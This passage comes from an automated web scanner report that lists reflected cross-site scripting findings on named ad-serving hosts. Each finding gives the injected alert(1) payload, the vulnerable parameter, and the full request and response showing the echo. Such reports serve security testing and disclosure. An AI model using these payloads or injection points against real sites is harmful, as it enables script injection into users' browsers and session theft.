ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver6ad07<script>alert(1)</script>d54a737c557';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='158267578813047
...[SNIP]...

5.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5990e<script>alert(1)</script>1abdce68969 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/5990e<script>alert(1)</script>1abdce68969&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:11:03 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Tue, 10-May-2011 18:11:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-07-2011-18-11-03_17122131801304791863; expires=Thu, 05-May-2016 18:11:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_17122131801304791863; expires=Sat, 07-May-2011 18:26:03 GMT; path=/; domain=c3metrics.com
Content-Length: 6680
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='17122131801304791863';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/5990e<script>alert(1)</script>1abdce68969';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload d9236<script>alert(1)</script>a36a1dbb30c was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=d9236<script>alert(1)</script>a36a1dbb30c&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:10:51 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Tue, 10-May-2011 18:10:51 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-07-2011-18-10-51_10220763251304791851; expires=Thu, 05-May-2016 18:10:51 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_10220763251304791851; expires=Sat, 07-May-2011 18:25:51 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
72191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='10220763251304791851';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='d9236<script>alert(1)</script>a36a1dbb30c';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

5.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload f1122<script>alert(1)</script>7b17a05670a was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72f1122<script>alert(1)</script>7b17a05670a&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:10:50 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Tue, 10-May-2011 18:10:50 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-07-2011-18-10-50_15669854861304791850; expires=Thu, 05-May-2016 18:10:50 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_15669854861304791850; expires=Sat, 07-May-2011 18:25:50 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
his.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='15669854861304791850';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72f1122<script>alert(1)</script>7b17a05670a';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

5.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload df0c4<script>alert(1)</script>70a2cfc4d2b was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=df0c4<script>alert(1)</script>70a2cfc4d2b&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:10:53 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Tue, 10-May-2011 18:10:53 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-07-2011-18-10-53_16190831941304791853; expires=Thu, 05-May-2016 18:10:53 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_16190831941304791853; expires=Sat, 07-May-2011 18:25:53 GMT; path=/; domain=c3metrics.com
Content-Length: 6679
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='16190831941304791853';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='df0c4<script>alert(1)</script>70a2cfc4d2b';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload c5b46<script>alert(1)</script>8bcd363fa65 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480c5b46<script>alert(1)</script>8bcd363fa65&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:11:14 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s13; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480c5b46<script>alert(1)</script>8bcd363fa65&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=ne
...[SNIP]...

5.8. http://480-adver-view.c3metrics.com/v.js [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 96fa8<script>alert(1)</script>6358e20ce5f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver96fa8<script>alert(1)</script>6358e20ce5f&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:11:14 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s10; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver96fa8<script>alert(1)</script>6358e20ce5f&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;
...[SNIP]...

5.9. http://480-adver-view.c3metrics.com/v.js [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 662f9<script>alert(1)</script>149c1c958ab was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=72662f9<script>alert(1)</script>149c1c958ab HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:11:15 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s12; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=72662f9<script>alert(1)</script>149c1c958ab&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new Reg
...[SNIP]...

5.10. http://ad.adlegend.com/jscript [@CPSC@ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.adlegend.com
Path:   /jscript

Issue detail

The value of the @CPSC@ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 820fb'%3balert(1)//e1423ad6361 was submitted in the @CPSC@ parameter. This input was echoed as 820fb';alert(1)//e1423ad6361 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jscript?spacedesc=2122025_1080850_300x160_1111357_2122025&ML_NIF=N&target=_blank&@CPSC@=820fb'%3balert(1)//e1423ad6361 HTTP/1.1
Host: ad.adlegend.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=43-847748576; CSList=1090846/1088030,0/0,0/0,0/0,0/0

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 22:37:45 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.adlegend.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=43-847748576; expires=Tue, 07 May 2013 10:37:45 GMT; path=/; domain=.adlegend.com
Set-Cookie: CSList=1076702/1080850,1090846/1088030,0/0,0/0,0/0; expires=Fri, 05 Aug 2011 22:37:45 GMT; path=/; domain=.adlegend.com
Content-Type: application/x-javascript
Content-Length: 444
Connection: close

document.write('<A HREF="http://ad.adlegend.com/click.ng?spacedesc=2122025_1080850_300x160_1111357_2122025&af=2095360&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2122025&ml_camp=1076702&ml_crid=2127402&click=820fb';alert(1)//e1423ad6361http://www.nbc.com/the-apprentice/" TARGET="_blank">
...[SNIP]...

5.11. http://ad.adlegend.com/jscript [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.adlegend.com
Path:   /jscript

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89b76'-alert(1)-'aee1add2168 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jscript?spacedesc=2122025_1080850_300x160_1111357_2122025&ML_NIF=N&target=_blank&@CPSC@=&89b76'-alert(1)-'aee1add2168=1 HTTP/1.1
Host: ad.adlegend.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=43-847748576; CSList=1090846/1088030,0/0,0/0,0/0,0/0

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 22:37:45 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.adlegend.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=43-847748576; expires=Tue, 07 May 2013 10:37:45 GMT; path=/; domain=.adlegend.com
Set-Cookie: CSList=1076702/1080850,1090846/1088030,0/0,0/0,0/0; expires=Fri, 05 Aug 2011 22:37:45 GMT; path=/; domain=.adlegend.com
Content-Type: application/x-javascript
Content-Length: 447
Connection: close

document.write('<A HREF="http://ad.adlegend.com/click.ng?spacedesc=2122025_1080850_300x160_1111357_2122025&af=2095360&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2122025&ml_camp=1076702&ml_crid=2127402&click=&89b76'-alert(1)-'aee1add2168=1http://www.nbc.com/the-apprentice/" TARGET="_blank">
...[SNIP]...

5.12. http://ad.adlegend.com/jscript [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.adlegend.com
Path:   /jscript

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36136'%3balert(1)//ba143b688f2 was submitted in the target parameter. This input was echoed as 36136';alert(1)//ba143b688f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jscript?spacedesc=2122025_1080850_300x160_1111357_2122025&ML_NIF=N&target=_blank36136'%3balert(1)//ba143b688f2&@CPSC@= HTTP/1.1
Host: ad.adlegend.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=43-847748576; CSList=1090846/1088030,0/0,0/0,0/0,0/0

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 22:37:45 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
